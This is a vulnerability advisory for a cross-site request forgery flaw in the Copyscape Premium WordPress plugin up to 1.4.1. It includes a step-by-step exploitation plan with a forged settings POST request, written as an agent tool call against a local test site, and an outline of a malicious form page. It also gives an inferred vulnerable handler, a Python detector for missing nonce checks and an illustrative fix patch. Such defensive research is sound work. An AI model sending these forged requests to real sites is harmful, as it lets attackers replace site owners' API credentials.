Copyscape Premium <= 1.4.1 - Cross-Site Request Forgery
Description
The Copyscape Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Technical Details
Affected versions: <= 1.4.1
Source Code: WordPress.org SVN
This plan outlines the steps to research and exploit a Cross-Site Request Forgery (CSRF) vulnerability in the Copyscape Premium plugin (<= 1.4.1).
1. Vulnerability Summary
The Copyscape Premium plugin fails to implement or correctly verify WordPress nonces in its settings management logic. This allows an unauthenticated attacker to craft a malicious request that, if executed by a logged-in administrator (e.g., via a phishing link), can modify the plugin's configuration, such as API credentials or service settings.
2. Attack Vector Analysis
- Target Endpoint: Likely the admin settings page handler. This usually involves wp-admin/options-general.php (if using the Settings API) or a custom admin page handler at wp-admin/admin.php.
- Vulnerable Action: The code path triggered when saving plugin settings (Username, API Key, etc.).
- HTTP Method: POST.
- Authentication: Requires a victim with manage_options capabilities (Administrator).
- Preconditions: The attacker must know the parameter names used by the plugin to store settings.
3. Code Flow (Inferred)
- Entry Point: The plugin registers an admin menu via add_options_page() or add_menu_page().
- Hook: A handler function is likely hooked to admin_init or used as the callback in the menu registration.
- Processing:
  - The handler checks if $_POST['submit'] (or a similar key) is set.
  - It checks user capabilities using current_user_can('manage_options').
  - Vulnerability: It fails to call check_admin_referer() or wp_verify_nonce() to validate the request origin.
- Sink: The settings are saved using update_option().
4. Nonce Acquisition Strategy
Because the vulnerability is missing or incorrect nonce validation, a valid nonce is not required to perform the exploit. The goal is to demonstrate that the request succeeds even when the _wpnonce parameter is omitted or set to an invalid value.
Verification of Absence:
- Navigate to the plugin settings page: browser_navigate("/wp-admin/options-general.php?page=copyscape-premium") (verify the exact slug via wp-cli).
- Use browser_eval to check for the presence of a nonce field in the form: browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value").
- If a nonce exists but is not validated, the exploit will still work by providing a random string.
5. Exploitation Strategy
Step 1: Discover Target Parameters
Search the plugin code for the settings keys:
grep -r "update_option" /var/www/html/wp-content/plugins/copyscape-premium/
Look for keys like copyscape_username, copyscape_api_key, or copyscape_settings.
Step 2: Formulate the CSRF Request
Based on common WordPress patterns, the exploit will target the settings page.
Request Details:
- URL: http://localhost:8080/wp-admin/admin.php?page=copyscape-premium (slug to be confirmed)
- Method: POST
- Content-Type: application/x-www-form-urlencoded
- Payload (Inferred): copyscape_username=attacker_user&copyscape_api_key=MALICIOUS_KEY&submit=Save+Changes
Step 3: Execution via Agent
The agent will simulate the CSRF by sending a cross-origin-style POST request while the admin session is active.
// Example using http_request tool
{
  "url": "http://localhost:8080/wp-admin/admin.php?page=copyscape-premium",
  "method": "POST",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "body": "copyscape_username=hacked&copyscape_api_key=hacked_key&submit=Save+Changes"
}
6. Test Data Setup
- Install Plugin: Ensure Copyscape Premium version 1.4.1 is installed and active.
- Initial State: Configure the plugin with legitimate-looking dummy data.
  wp option update copyscape_username "legit_user"
  wp option update copyscape_api_key "legit_key_12345"
- Admin Login: The agent must ensure an admin session is active in the browser context.
7. Expected Results
- The server should return a 302 Found redirecting back to the settings page with a success message (e.g., &settings-updated=true).
- The database options for the plugin should be updated to the attacker's values.
- No "Are you sure you want to do this?" (WordPress default CSRF failure page) should appear.
8. Verification Steps
After the http_request is sent:
- Check Options: Use WP-CLI to verify the change.
  wp option get copyscape_username
  wp option get copyscape_api_key
- Confirm Success: If the values match hacked and hacked_key, the CSRF is confirmed.
9. Alternative Approaches
If the settings are not handled via a custom page but via the standard options.php handler:
- Target URL: http://localhost:8080/wp-admin/options.php
- Payload: option_page=copyscape_settings_group&action=update&copyscape_username=hacked&copyscape_api_key=hacked_key
- Audit Step: Check register_setting() calls in the plugin source to find the option_group name.
Summary
The Copyscape Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because it fails to perform nonce validation when saving its settings. This allows attackers to modify the plugin's API credentials and other configurations by tricking a logged-in administrator into interacting with a malicious link or form.
Vulnerable Code
// Inferred from research plan section 3 & 5
function copyscape_premium_settings_page() {
    if (isset($_POST['submit'])) {
        // VULNERABILITY: Missing check_admin_referer() or wp_verify_nonce()
        if (current_user_can('manage_options')) {
            update_option('copyscape_username', $_POST['copyscape_username']);
            update_option('copyscape_api_key', $_POST['copyscape_api_key']);
        }
    }
    // ... rest of the settings page logic ...
}
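A static check for the pattern described in section 3 and shown in the handler above, added here as an example and not code from the advisory or the plugin: it walks each top-level PHP function, flags those that pass $_POST data to update_option() without a check_admin_referer(), wp_verify_nonce() or check_ajax_referer() call in the same body, and runs on a constructed copy of the inferred handler both without and with the nonce check from the fix.

```python
import re

# Constructed sample: the handler inferred on this page, with no nonce check.
VULNERABLE_SRC = """<?php
function copyscape_premium_settings_page() {
    if (isset($_POST['submit'])) {
        if (current_user_can('manage_options')) {
            update_option('copyscape_username', $_POST['copyscape_username']);
            update_option('copyscape_api_key', $_POST['copyscape_api_key']);
        }
    }
}
"""

# Constructed sample: the same handler with the nonce check from the fix applied.
FIXED_SRC = VULNERABLE_SRC.replace(
    "if (isset($_POST['submit'])) {",
    "if (isset($_POST['submit'])) {\n        check_admin_referer('copyscape_save_settings');",
)

# Any of these inside the function body counts as request-origin validation.
NONCE_CALLS = ("check_admin_referer(", "wp_verify_nonce(", "check_ajax_referer(")


def php_functions(src):
    """Yield (name, body) for each top-level PHP function by matching braces."""
    for m in re.finditer(r"\bfunction\s+(\w+)\s*\([^)]*\)\s*\{", src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        yield m.group(1), src[m.end():i - 1]


def find_unprotected_handlers(src):
    """Return names of functions that persist $_POST input without a nonce check."""
    findings = []
    for name, body in php_functions(src):
        writes_request_input = "update_option(" in body and "$_POST" in body
        has_nonce_check = any(call in body for call in NONCE_CALLS)
        if writes_request_input and not has_nonce_check:
            findings.append(name)
    return findings


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_SRC), ("fixed", FIXED_SRC)):
        print(label, find_unprotected_handlers(src))
```

Point the same function at the contents of each .php file under the plugin directory to reproduce the audit from section 5, step 1, with the nonce-check condition applied automatically.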
Security Fix
@@ -X,Y +X,Y @@ function copyscape_premium_settings_page() { if (isset($_POST['submit'])) { + check_admin_referer('copyscape_save_settings'); if (current_user_can('manage_options')) { - update_option('copyscape_username', $_POST['copyscape_username']); - update_option('copyscape_api_key', $_POST['copyscape_api_key']); + update_option('copyscape_username', sanitize_text_field($_POST['copyscape_username'])); + update_option('copyscape_api_key', sanitize_text_field($_POST['copyscape_api_key'])); } } @@ -A,B +A,B @@ <form method="post"> + <?php wp_nonce_field('copyscape_save_settings'); ?> <input type="text" name="copyscape_username" value="...">
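Review bot: the hunk headers `@@ -X,Y +X,Y @@` and `@@ -A,B +A,B @@` carry placeholder line numbers, so this patch is illustrative and will not apply with git apply; the functional change in the first hunk is right, since `+ check_admin_referer('copyscape_save_settings');` runs as soon as the `submit` branch is entered and wp_die()s before any update_option() call can be reached by a forged request. One thing to tighten: sanitize_text_field() only strips tags and surrounding whitespace, so an empty or malformed API key is still stored silently; consider rejecting an empty value and reporting it with add_settings_error() instead.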
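Review bot: in the second hunk the action string in `+ <?php wp_nonce_field('copyscape_save_settings'); ?>` matches the one passed to check_admin_referer() in the first hunk, which is required for legitimate submissions to pass; wp_nonce_field() uses the default field name `_wpnonce` that check_admin_referer() expects, so no further arguments are needed. The hunk shows only `<form method="post">` and one input, so confirm the form posts back to the same admin page URL (or has no action attribute) so the request lands on the handler that performs the check.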
Exploit Outline
The exploit targets the plugin's administration settings page, typically located at `/wp-admin/admin.php?page=copyscape-premium`.
1. Target Endpoint: The plugin's custom settings menu handler.
2. Methodology: An attacker crafts a malicious HTML page containing a form that targets the settings URL using the POST method.
3. Payload: The form includes parameters such as 'copyscape_username' and 'copyscape_api_key' set to values controlled by the attacker, along with a 'submit' parameter to trigger the processing logic.
4. Requirements: The attacker must trick a site administrator with 'manage_options' capabilities into visiting the malicious page while logged into the WordPress dashboard.
5. Outcome: Because the plugin lacks CSRF protection (nonces), the server accepts the forged request as a legitimate settings update, effectively replacing the site's Copyscape API credentials with those of the attacker.